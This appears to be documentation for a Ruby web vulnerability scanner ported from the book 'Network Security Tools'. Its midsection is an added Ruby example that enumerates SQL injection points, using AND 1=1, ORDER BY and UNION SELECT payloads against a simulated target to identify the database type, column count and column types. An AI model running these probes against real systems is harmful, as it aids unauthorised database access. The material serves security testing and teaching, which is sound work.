extendedscanner.rb

Path: extendedscanner.rb
Last Update: Sat Nov 03 12:48:28 +1100 2007

Synopsis

This is a Ruby port of the Perl version of Extended Scanner presented in Chapter 9 of Network Security Tools by Justin Clarke et al. Refer to www.oreilly.com/catalog/networkst/ for the sample chapter and the Perl source code. The book is definitely worth a read for any serious security professional.

The scanner parses a Burp proxy log file (refer to portswigger.net/proxy/), replays the logged requests with test payloads, and looks for the following web application vulnerabilities:

 1. SQL Injection
 2. Cross Site Scripting
 3. Directory Listings

The extended scanner goes beyond detection: for each discovered SQL injection point it enumerates the backend and prepares the ground for exploitation. The following information is enumerated:

 1. Whether the injection is real (i.e., not a false positive)
 2. Backend database type (currently supports MS SQL, Oracle and MySQL)
 3. Number of columns returned by the query at the injection point
 4. Data type of each of those columns
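The four enumeration steps above are all driven by differential response analysis: send a payload, compare the page that comes back with a baseline page, and treat "same as baseline", "different" and "database error" as three distinct signals. The following Ruby block is an added example that shows the technique end to end; it is not the scanner's code and does not parse a Burp log. It runs against a constructed in-memory target that mimics a page backed by `SELECT name, price FROM products WHERE id = <id>` on an MS SQL style backend (ORDER BY past the column count and UNION type mismatches raise errors, as they do on real MS SQL Server). The fingerprint predicates, the error-string regex and the `FakeTarget` class are all assumptions made for the example.

```ruby
# Added example: SQL injection enumeration by differential response analysis.
# FakeTarget is a constructed stand-in for a vulnerable web page so the block
# runs offline; in a real scan fetch() would issue an HTTP request instead.
class FakeTarget
  COLUMN_TYPES = [:string, :integer].freeze   # schema of the vulnerable SELECT

  def fetch(inj)
    case inj
    when /\A1\z/                      then row_page
    when /\A1 AND (.+)\z/             then predicate_page($1)
    when /\A1 ORDER BY (\d+)\z/       then order_by_page($1.to_i)
    when /\A1 UNION SELECT (.+)\z/    then union_page($1)
    else error("Incorrect syntax near '#{inj}'.")
    end
  end

  private

  def row_page  = "<tr><td>widget</td><td>42</td></tr>"
  def error(m)  = "<b>Error:</b> #{m}"

  def predicate_page(pred)
    case pred
    when '1=1', '@@PACK_RECEIVED=@@PACK_RECEIVED' then row_page   # true on MS SQL
    when '1=2'            then "<p>No product found.</p>"
    when /CONNECTION_ID/  then error("'CONNECTION_ID' is not a recognized built-in function name.")
    when /ROWNUM/         then error("Invalid column name 'ROWNUM'.")
    else error("Incorrect syntax near '#{pred}'.")
    end
  end

  def order_by_page(n)
    return row_page if n <= COLUMN_TYPES.size
    error("The ORDER BY position number #{n} is out of range of the number of items in the select list.")
  end

  # Naive split on ',' is fine for the NULL / 'a' / 1 probes used below.
  def union_page(list)
    vals = list.split(',').map(&:strip)
    return error("All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.") unless vals.size == COLUMN_TYPES.size
    vals.each_with_index do |v, i|
      next if v.casecmp('NULL').zero?
      lit = v.start_with?("'") ? :string : :integer
      return error("Conversion failed when converting the varchar value to data type int.") unless lit == COLUMN_TYPES[i]
    end
    row_page
  end
end

class SqliEnumerator
  # Fragments of genuine MS SQL error messages; a real scanner carries a
  # per-DBMS list of these (assumption: this short list is enough for the example).
  ERROR_RE = /Conversion failed|out of range|not a recognized|Invalid column name|equal number of expressions|Incorrect syntax/

  # Predicates that are only valid on one DBMS: the page only comes back
  # unchanged on the backend that can evaluate them (assumed fingerprints).
  FINGERPRINTS = {
    'MS SQL' => '@@PACK_RECEIVED=@@PACK_RECEIVED',
    'MySQL'  => 'CONNECTION_ID()=CONNECTION_ID()',
    'Oracle' => 'ROWNUM=ROWNUM',
  }.freeze

  def initialize(target, base_value)
    @target, @base = target, base_value
    @baseline = target.fetch(base_value)      # the page for the untouched value
  end

  def error?(body) = !!(body =~ ERROR_RE)

  # 1. A true predicate must reproduce the baseline and a false one must not;
  #    anything else (e.g. both identical) is a false positive.
  def injectable?
    t = @target.fetch("#{@base} AND 1=1")
    f = @target.fetch("#{@base} AND 1=2")
    t == @baseline && f != @baseline
  end

  # 2. Backend type: first fingerprint whose predicate leaves the page unchanged.
  def database_type
    FINGERPRINTS.each { |name, pred| return name if @target.fetch("#{@base} AND #{pred}") == @baseline }
    nil
  end

  # 3. ORDER BY n: the first n that errors is one past the number of columns.
  def column_count(max = 64)
    (1..max).each { |n| return n - 1 if error?(@target.fetch("#{@base} ORDER BY #{n}")) }
    nil
  end

  # 4. UNION SELECT NULL,...: swap one probe literal per slot; the probe that
  #    does not raise a conversion error reveals the column's type.
  def column_types(count)
    probes = { string: "'a'", integer: '1' }
    (0...count).map do |i|
      hit = probes.find do |_, lit|
        vals = Array.new(count, 'NULL'); vals[i] = lit
        !error?(@target.fetch("#{@base} UNION SELECT #{vals.join(',')}"))
      end
      hit ? hit.first : :unknown
    end
  end
end

if __FILE__ == $0
  e = SqliEnumerator.new(FakeTarget.new, '1')
  puts "injectable: #{e.injectable?}, dbms: #{e.database_type}"
  n = e.column_count
  puts "columns: #{n}, types: #{e.column_types(n).inspect}"
end
```

Two caveats a practitioner would keep in mind: the baseline comparison should ignore volatile page content (timestamps, session tokens) or every request will look "different", and the UNION type probe as written only distinguishes string from integer on a backend that refuses implicit conversions; MySQL silently converts, so there the column types have to be inferred from the rendered UNION row instead.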

The scanner can also tunnel all of its requests through an HTTP proxy and send a static cookie with every request, so that authenticated pages can be tested.

Original Code

Copyright (c) 2005 O'Reilly Media, Inc. All rights reserved.
Network Security Tools by Justin Clarke, Nitesh Dhanjani
Note: The original code and chapter were authored by Brian Holyfield

New Code

Copyright (c) 2007 by Security Technology Science Pty Ltd. All rights reserved.

License

Licensed under the GNU GPL v2. Refer to LICENSE in the downloaded package.

Example

Using a static cookie

 ruby extendedscanner.rb --cookie "cid=1234; secure" --log burplog.txt https://www.example.com:443

Using a proxy to tunnel requests

 ruby extendedscanner.rb --proxy_ip 127.0.0.1 --proxy_port 8080 --log burplog.txt http://www.example.com:80

Required files

 optparse
 ostruct
 uri
 lib/parser
 lib/browser
